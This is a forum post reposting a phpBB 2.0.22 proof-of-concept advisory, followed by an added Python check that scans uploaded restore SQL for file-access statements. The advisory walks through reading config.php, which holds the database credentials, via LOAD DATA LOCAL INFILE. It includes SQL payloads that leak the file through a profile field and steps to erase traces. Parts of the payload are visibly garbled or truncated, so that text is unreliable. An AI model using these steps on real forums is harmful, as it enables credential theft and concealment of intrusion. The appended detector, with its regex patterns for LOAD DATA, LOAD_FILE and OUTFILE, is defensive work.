Security & Hacking => Bugs | Exploits | Vulnerabilities => Topic started by: DarkGenesis on 20 October 2007, 09:41:30 AM
Title: phpBB <= 2.0.22 Remote Database Authentication
Post by: DarkGenesis on 20 October 2007, 09:41:30 AM
phpBB <= 2.0.22 Remote Database Authentication
Quote:
## phpBB <= 2.0.22 Remote Database Authentication Details POC ##
##
## This text will show you how to get the content of the file
## config.php with the 'LOCAL INFILE' SQL command. You can also
## do it with 'LOAD_FILE' but you'll need file privileges, that's
## not interesting. To do it, you'll need Administrator rights
## (we'll use admin_db_utilities.php) and local_infile=ON
## (you don't need file privileges, that's why it's quite cool).
## PHP scripts should not permit the user to execute SQL commands.
##
## 1 Go to http:///login.php?redirect=admin/index.php&admin=1
## 2 Log in as Administrator
##
## 3 Go to http:///admin/admin_styles.php?mode[]=create&sid=
## 4 You'll get a full path disclosure, note it somewhere
##
## 5 Go to http:///admin/admin_db_utilities.php?perform=backup&sid=
## 6 Choose "Structure-Only backup" then click on "Start Backup"
## 7 Now open the file and search for the table prefix, note it
##
## 8 Go to http:///admin/admin_db_utilities.php?perform=restore&sid=
## 9 Create a file which has this content [replace ,,]:
## /*----------------------------------------------------------------------*/
## CREATE TABLE tmp_hack(content text, email text, viewemail text);
## LOAD DATA LOCAL INFILE 'config.php' INTO TABLE tmp_hack FIELDS
## TERMINATED BY '__eof__' ESCAPED BY '' LINES TERMINATED BY '__eof__';
## UPDATE tmp_hack SET viewemail=(SELECT user_viewemail FROM users WHERE
## username=''), email=(SELECT user_email FROM users WHERE username='');
## UPDATE users SET user_viewemail=0, user_email=
## CONCAT('">Encoded content
## UNHEX(20),'type="text" value="',
## (SELECT HEX(content) FROM tmp_hack),'">
##
## 11 Go to http:///profile.php?mode=editprofile, get the encoded content
## 12 This is the encoded content of the file config.php, use the pack() function to decode it
## 13 For example, with php, type this in your shell: php -r print(pack('H*',''));
## 14 Note that I encoded the file content because this can produce an SQL error (e.g. login.php)
##
## 15 If you want to clear traces, execute this SQL file [replace ,]:
## /*----------------------------------------------------------------------*/
## UPDATE users SET user_viewemail=(SELECT viewemail FROM tmp_hack),
## user_email=(SELECT email FROM tmp_hack) WHERE username='';
## DROP TABLE tmp_hack;
## /*----------------------------------------------------------------------*/
##
## by DarkFig
## http://acid-root.new.fr/
## #acidroot@irc.worldnet.net
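Added audit check, not part of the advisory or of phpBB: it inspects an uploaded "restore" SQL file for the file-access statements the advisory relies on (LOAD DATA, LOAD_FILE(), INTO OUTFILE/DUMPFILE) after stripping comments, so a keyword split by /* */ is still caught. The sample SQL is constructed; this complements setting local_infile=OFF on the MySQL side and the advisory's own point that user-supplied SQL should not be executed by the application.

```python
import re

# Constructed sample of an uploaded restore file: legitimate DDL plus the
# kind of file-reading statements the advisory uses, one of them hidden
# behind inline comments.
SAMPLE_RESTORE = """\
CREATE TABLE phpbb_tmp(content text);
/* comment */ LOAD /* split */ DATA LOCAL INFILE 'config.php' INTO TABLE phpbb_tmp;
SELECT LOAD_FILE('/etc/hostname');
INSERT INTO phpbb_config VALUES ('x', 'y');
"""

# Statements that reach the filesystem of the DB client (LOCAL INFILE) or
# the DB server (LOAD_FILE, OUTFILE/DUMPFILE). \s+ also spans newlines.
FILE_ACCESS_PATTERNS = {
    "LOAD DATA": re.compile(r"\bLOAD\s+DATA\b", re.I),
    "LOAD_FILE()": re.compile(r"\bLOAD_FILE\s*\(", re.I),
    "INTO OUTFILE/DUMPFILE": re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\b", re.I),
}


def strip_sql_comments(sql: str) -> str:
    """Blank out /* */, -- and # comments while keeping line count intact."""
    # Block comments: keep their newlines so reported line numbers stay right.
    sql = re.sub(r"/\*.*?\*/", lambda m: "\n" * m.group(0).count("\n") + " ",
                 sql, flags=re.S)
    # Line comments: MySQL requires whitespace after "--"; "#" needs none.
    sql = re.sub(r"(--\s|#).*$", " ", sql, flags=re.M)
    return sql


def find_file_access(sql: str) -> list[tuple[int, str]]:
    """Return (line_number, label) for each file-access statement found."""
    cleaned = strip_sql_comments(sql)
    findings = []
    for label, pattern in FILE_ACCESS_PATTERNS.items():
        for m in pattern.finditer(cleaned):
            findings.append((cleaned.count("\n", 0, m.start()) + 1, label))
    return sorted(findings)


def restore_is_safe(sql: str) -> bool:
    """Gate for the restore handler: reject any upload with findings."""
    return not find_file_access(sql)


if __name__ == "__main__":
    for lineno, label in find_file_access(SAMPLE_RESTORE):
        print(f"line {lineno}: {label}")
```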